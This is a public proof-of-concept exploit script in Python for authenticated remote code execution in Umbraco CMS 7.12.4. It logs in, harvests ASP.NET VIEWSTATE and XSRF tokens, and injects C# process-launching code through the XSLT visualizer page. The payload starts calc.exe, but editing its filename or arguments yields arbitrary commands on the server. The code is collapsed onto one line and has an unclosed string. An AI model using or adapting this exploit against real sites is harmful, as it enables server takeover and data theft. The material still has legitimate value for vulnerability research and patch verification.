# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators # Dork: N/A # Date: 2019-01-13 # Exploit Author: Gregory DRAPERI & Hugo BOUTINON # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # CVE: N/A import requests; from bs4 import BeautifulSoup; def print_dict(dico): print(dico.items()); print("Start"); # Execute a calc for the PoC payload = '\ public string xml() \ { string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ \ '; login = "XXXX; password="XXXX"; host = "XXXX"; # Step 1 - Get Main page s = requests.session() url_main =host+"/umbraco/"; r1 = s.get(url_main); print_dict(r1.cookies); # Step 2 - Process Login url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"; loginfo = {"username":login,"password":password}; r2 = s.post(url_login,json=loginfo); # Step 3 - Go to vulnerable web page url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx"; r3 = s.get(url_xslt); soup = BeautifulSoup(r3.text, 'html.parser'); VIEWSTATE = soup.find(id="__VIEWSTATE")['value']; VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']; UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']; headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN}; data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"}; # Step 4 - Launch the attack r4 = s.post(url_xslt,data=data,headers=headers); print("End");